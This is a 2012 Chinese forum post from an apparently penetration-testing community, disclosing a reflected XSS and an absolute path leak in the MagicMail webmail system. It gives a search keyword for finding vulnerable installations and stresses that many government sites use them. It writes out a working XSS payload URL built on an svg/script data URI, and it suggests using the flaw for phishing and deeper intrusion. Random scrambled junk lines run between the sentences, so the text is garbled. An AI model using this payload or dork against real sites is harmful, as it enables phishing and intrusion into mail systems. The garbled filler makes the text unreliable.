中国网络渗透测试联盟
标题:
MagicMail迈捷邮件系统XSS及绝对路径漏洞
[打印本页]
作者:
admin
时间:
2012-11-9 20:38
标题:
MagicMail迈捷邮件系统XSS及绝对路径漏洞
今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
( G1 r" c3 t4 e9 S2 K3 |, s% |
. L) ]5 @+ {/ |$ E& b
: ~( K# C8 U. t$ S
包含 一个反射性XSS 以及 绝对路径泄漏
; Y% g) ~; {+ d' G+ M
看了看 貌似全部是linux的。
' S( ~7 X$ o+ f$ S& \
; w. F3 M% p# G B
关键字:迈捷邮件系统 by MagicMail
/ J2 k: W8 {& k
K6 O0 n J* O# K% o3 ~$ l5 d
可以看到很多政府网站都用这个邮件系统
4 {, E* W- A( E- s: b+ v
, v: q! T" J) P5 A2 D
绝对路径
http://madman.in/index.php?login_type=declare&language=
; v+ `& b, j1 S. a# `2 u
# G0 F+ ^ p! K5 H
+ L# b* S. G2 O9 r: D; ]
! }1 i9 n6 i7 [9 v
XSS:
http://madman.in/index.php?login_type=declare&language=
–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E
' @- h0 d: n+ r* u- o
1 D& ~' f& H% m! I7 z7 w
$ i- m1 K1 f% g) u. M; q
" [/ M) p4 M5 n' p" m
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等
9 ~8 ]# h5 w" [( b
4 j( R/ r& d0 _0 @4 n
修复方案:看官方补丁吧。
% L& I" B* A+ |% G) L e$ Q* U! G1 o2 I
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2